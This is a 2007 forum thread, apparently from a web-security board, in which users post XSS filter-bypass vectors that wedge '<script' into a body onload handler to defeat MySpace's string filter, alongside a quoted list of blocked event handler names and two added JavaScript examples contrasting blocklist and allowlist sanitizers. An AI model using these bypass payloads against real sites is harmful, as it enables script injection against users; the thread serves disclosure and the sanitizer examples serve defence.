Myspace (my turn...again)
Posted by: digi7al64
Date: January 10, 2007 06:31AM

In my previous Myspace (my turn) thread I stated that if MySpace devs didn't patch the problem correctly I would post more.

So the vector that I posted 4 days ago has been patched (along with the 4 previous sploits exposing the same vulns from various contributors). Again they have failed to do it correctly, again after countless posts describing the issue, outlining the problem and providing methods of fixing it... they have failed... alas, I must carry out my statement, else "shenanigans" be called.

Here is the code walkthrough I used to find it:
<body<scriptonload=<scriptt>alert('xss');> 		<body..onload=..t>alert('xss');>
<body <scriptonload<scriptt>=alert('xss');> 	 	<body ..onload..t>=alert('xss');>
<body <scriptonload<script=alert('xss');>		<body ..onload..=alert('xss');>
<body <script onload<script=alert('xss');>		<body .. onload..=alert('xss');>

btw: the patch for the last code I posted was to ignore it altogether; however, as I expected, they aren't actually rewriting the code to fix the problem, instead they are only targeting specific strings (hence the extra <script tag to fool them... muhahahahahaha!).

ps: As always I have more vectors, however I am enjoying this so I will await their code response before I post again.

pss: rsnake, thanks for the blog mention, it has been my single goal since joining here to do something worthy of inclusion \0/

psss: finding sploits in MySpace might seem like a useless cause (if not skiddish), but, since they are the largest online social network in the world I think it makes perfect sense to target them.

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

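The behaviour the post describes (a filter that targets specific strings and is fooled by an extra `<script` wedged into the handler name) is easy to reproduce in a few lines. What follows is an added example written for this page, not code from the post or from MySpace, and the rule list in it is a guess standing in for whatever the real filter used. It shows a single-pass string filter being bypassed by a vector of the same shape as those in the thread, a version that repeats the pass until nothing changes, and why even that version is still only a blocklist.

```javascript
// Added example, not code from the thread or from MySpace. It models the
// behaviour described in the post: a filter that deletes a fixed list of
// strings in one pass, so a token removed late in the pass can reassemble a
// token that was checked (and missed) earlier in the same pass.

// Hypothetical rule list; the real filter's rules are not known.
// Order matters: the handler pattern is checked before "<script" is removed.
const RULES = ['onload=', '<script'];

// Single-pass filter: delete every occurrence of each rule, in order.
function stripOnce(input) {
  let out = input;
  for (const token of RULES) {
    out = out.split(token).join('');
  }
  return out;
}

// Repeat stripOnce until the output stops changing (a fixpoint).
function stripToFixpoint(input, maxRounds = 10) {
  let current = input;
  for (let round = 0; round < maxRounds; round++) {
    const next = stripOnce(current);
    if (next === current) return next;
    current = next;
  }
  throw new Error('filter did not converge');
}

// Does the (filtered) string still contain a blocked token?
function containsBlocked(s) {
  return RULES.some((token) => s.includes(token));
}

// Constructed sample inputs, modelled on the vectors quoted in the thread.
// "<script" sits between "onload" and "=", so the first rule never matches;
// the second rule then removes "<script" and "onload=" is back.
const VECTOR = "<body onload<script=alert('hello');>";
// HTML allows whitespace around "=", so this is a live handler too, but it
// never matched the literal "onload=" rule in the first place.
const SPACED = "<body onload =alert('hello');>";

function demo() {
  const once = stripOnce(VECTOR);
  const fixed = stripToFixpoint(VECTOR);
  return {
    once,                                 // one pass reassembles "onload="
    onceBlocked: containsBlocked(once),   // true: the bypass worked
    fixed,                                // second pass removes it
    fixedBlocked: containsBlocked(fixed), // false
    spacedSurvives: stripToFixpoint(SPACED) === SPACED, // true: still a blocklist
  };
}

console.log(demo());
```

Iterating to a fixpoint closes the specific "remove a token, recreate a token" hole, but it does nothing about variants the rule strings never matched, such as the spaced handler above. The fix that actually holds is to stop deleting strings and instead parse the markup and keep only known-good tags and attributes.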
Re: Myspace (my turn...again)
Posted by: Kyran
Date: January 10, 2007 07:35AM

Very nice! It's really bad that MySpace hasn't fixed this, basically the same issue, yet.

MySpace 0-Day Again (Again (Again (Again))) anyone?

- Kyran

Re: Myspace (my turn...again)
Posted by: WhiteAcid
Date: January 10, 2007 07:41AM

I'm really starting to enjoy reading these posts, or maybe that's just because it's 1:40pm and I haven't slept for a long time.

I think using powers to express the "agains" would be easier; MySpace 0day Again^4

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Re: Myspace (my turn...again)
Posted by: eyeced
Date: January 10, 2007 04:32PM

<body onload<script=alert('hello');>

Still works fine.. :S

Also some fragmentation works now that can bypass the filters. I'll just leave the posting of it till everything's patched so I can claim my MySpace Again (again, again, again, again) title. Well, either me or the first person to hit 'Post message' after it's been patched.

Re: Myspace (my turn...again)
Posted by: digi7al64
Date: January 10, 2007 05:24PM

eyeced - it is because they are only filtering for specific strings


<body onload<script=alert('hello');>

is not

<body onload<script=alert('xss');>

so it should work (though I haven't tested it, but I trust you)

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Re: Myspace (my turn...again)
Posted by: OrbityBaby
Date: January 11, 2007 12:01PM

digi7al64 Wrote:
-------------------------------------------------------
> In my previous Myspace (my turn) thread I stated
> that if MySpace devs didn't patch the problem
> correctly I would post more.
>
> So the vector that I posted 4 days ago has been
> patched (along with the 4 previous sploits
> exposing the same vulns from various contributors).
> Again they have failed to do it correctly, again
> after countless posts describing the issue,
> outlining the problem and providing methods of
> fixing it... they have failed... alas, I
> must carry out my statement, else "shenanigans" be
> called.
>
> Here is the code walkthrough I used to find it:
> <body<scriptonload=<scriptt>alert('xss');>      <body..onload=..t>alert('xss');>
> <body <scriptonload<scriptt>=alert('xss');>     <body ..onload..t>=alert('xss');>
> <body <scriptonload<script=alert('xss');>       <body ..onload..=alert('xss');>
> <body <script onload<script=alert('xss');>      <body .. onload..=alert('xss');>
>
> btw: the patch for the last code I posted was to
> ignore it altogether; however, as I expected, they
> aren't actually rewriting the code to fix the
> problem, instead they are only targeting specific
> strings (hence the extra <script tag to fool
> them... muhahahahahaha!).
>
> ps: As always I have more vectors, however I am
> enjoying this so I will await their code response
> before I post again.
>
> pss: rsnake, thanks for the blog mention, it has
> been my single goal since joining here to do
> something worthy of inclusion \0/
>
> psss: finding sploits in MySpace might seem like a
> useless cause (if not skiddish), but, since they
> are the largest online social network in the world
> I think it makes perfect sense to target them.


Looks like as of yesterday, 01/11/07, this has already been patched by MySpace. They're the worst. Got any others up your sleeve?

Re: Myspace (my turn...again)
Posted by: digi7al64
Date: January 11, 2007 05:29PM

hmmm, not at the moment; they seem to have finally got the idea and removed all the following javascript events and replaced them with ..

onabort
onblur
onchange
onclick
ondblclick
onerror
onfocus
onkeydown
onkeypress
onkeyup
onload
onmousedown
onmousemove
onmouseout
onmouseover
onmouseup
onreset
onresize
onselect
onsubmit
onunload

However, I still think I can find a trick or 2. Will post again when I get something.

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

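The list above is a blocklist of handler names, and a blocklist is only as good as its coverage. The following is an added example written for this page, not code from the thread or from MySpace. It parses a single tag with a deliberately small regex (a stand-in for a real HTML parser; it does not decode entities), then contrasts a filter that drops exactly the handler names the post lists with a filter that keeps only an assumed allowlist of attributes. The allowlist and the `http(s)`-only URL check are assumptions for illustration, not MySpace's rules; `onmouseenter` is used as an example of a real handler attribute that is simply not on the list.

```javascript
// Added example, not code from the thread or from MySpace. A blocklist built
// from the handler names quoted in the post, beside an allowlist filter.
// The tag parser is a small regex for illustration, not a full HTML parser,
// and it does not decode HTML entities in attribute values.

// The event handler names the post above says were removed.
const BLOCKED_HANDLERS = new Set([
  'onabort', 'onblur', 'onchange', 'onclick', 'ondblclick', 'onerror',
  'onfocus', 'onkeydown', 'onkeypress', 'onkeyup', 'onload', 'onmousedown',
  'onmousemove', 'onmouseout', 'onmouseover', 'onmouseup', 'onreset',
  'onresize', 'onselect', 'onsubmit', 'onunload',
]);

// Hypothetical allowlist for a profile-page filter (assumed, not MySpace's).
// Attributes that carry a URL get their value checked as well as their name.
const ALLOWED_ATTRS = new Set(['alt', 'title', 'class', 'width', 'height']);
const URL_ATTRS = new Set(['src', 'href']);

// Split "<tag a=b c='d' e>" into a tag name and lower-cased attribute names.
// Attribute names in HTML are case-insensitive, so "onLoad" is "onload".
function parseTag(tag) {
  const m = /^<([a-zA-Z][\w-]*)([^>]*)>$/.exec(tag.trim());
  if (!m) throw new Error('not a simple tag: ' + tag);
  const attrs = [];
  const re = /([^\s"'<>\/=]+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'=<>`]+)))?/g;
  let a;
  while ((a = re.exec(m[2])) !== null) {
    attrs.push({ name: a[1].toLowerCase(), value: a[2] ?? a[3] ?? a[4] ?? '' });
  }
  return { name: m[1].toLowerCase(), attrs };
}

// Keep URL values only if relative or http(s). Browsers ignore tabs and
// newlines inside a scheme, so control characters are removed before the
// check rather than letting them break the scheme match.
function isSafeUrl(value) {
  const v = value.replace(/[\u0000-\u0020]/g, '').toLowerCase();
  const colon = v.indexOf(':');
  if (colon === -1) return true; // no scheme: relative URL
  const scheme = v.slice(0, colon);
  if (!/^[a-z][a-z0-9+.-]*$/.test(scheme)) return true; // ':' is not a scheme separator
  return scheme === 'http' || scheme === 'https';
}

// Re-serialise with double-quoted values.
function render(name, attrs) {
  const parts = attrs.map((a) => `${a.name}="${a.value.replace(/"/g, '&quot;')}"`);
  return `<${[name, ...parts].join(' ')}>`;
}

// Blocklist: drop only the handler names on the list, keep everything else.
function blocklistFilter(tag) {
  const t = parseTag(tag);
  return render(t.name, t.attrs.filter((a) => !BLOCKED_HANDLERS.has(a.name)));
}

// Allowlist: keep only known-safe names, and URL attributes with safe values.
function allowlistFilter(tag) {
  const t = parseTag(tag);
  const kept = t.attrs.filter((a) =>
    ALLOWED_ATTRS.has(a.name) || (URL_ATTRS.has(a.name) && isSafeUrl(a.value)));
  return render(t.name, kept);
}

// Constructed sample tags: a handler not on the list, a mixed-case handler,
// and a javascript: URL that no handler blocklist would ever catch.
const SAMPLES = [
  '<img src="x" onmouseenter="alert(1)">',
  '<body onLoad="alert(1)">',
  '<a href="javascript:alert(1)" title="t">',
];

for (const s of SAMPLES) {
  console.log(s, '\n  blocklist:', blocklistFilter(s), '\n  allowlist:', allowlistFilter(s));
}
```

The blocklist passes `onmouseenter` untouched because the name is not on the list, and it would do the same for any other handler that was left off; the allowlist never has to know the handler's name, because an attribute it does not recognise is dropped by default. The same default-deny logic is what catches the `javascript:` URL, which is not an event handler at all.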
Re: Myspace (my turn...again)
Posted by: OrbityBaby
Date: January 11, 2007 07:03PM

digi7al64 Wrote:
-------------------------------------------------------
> hmmm, not at the moment; they seem to have finally
> got the idea and removed all the following
> javascript events and replaced them with ..
>
> onabort
> onblur
> onchange
> onclick
> ondblclick
> onerror
> onfocus
> onkeydown
> onkeypress
> onkeyup
> onload
> onmousedown
> onmousemove
> onmouseout
> onmouseover
> onmouseup
> onreset
> onresize
> onselect
> onsubmit
> onunload
>
> However, I still think I can find a trick or 2.
> Will post again when I get something.


great, thanks. you're the best.

Re: Myspace (my turn...again)
Posted by: rsnake
Date: January 12, 2007 01:01PM

The full list of event handlers is located at http://ha.ckers.org/xss.html#XSS_Event_handlers (obviously you have to scroll a lot). Most of those won't work, or require that you already have something on the page to execute them, but for anyone who wasn't already aware of all of them...

- RSnake
Gotta love it. http://ha.ckers.org
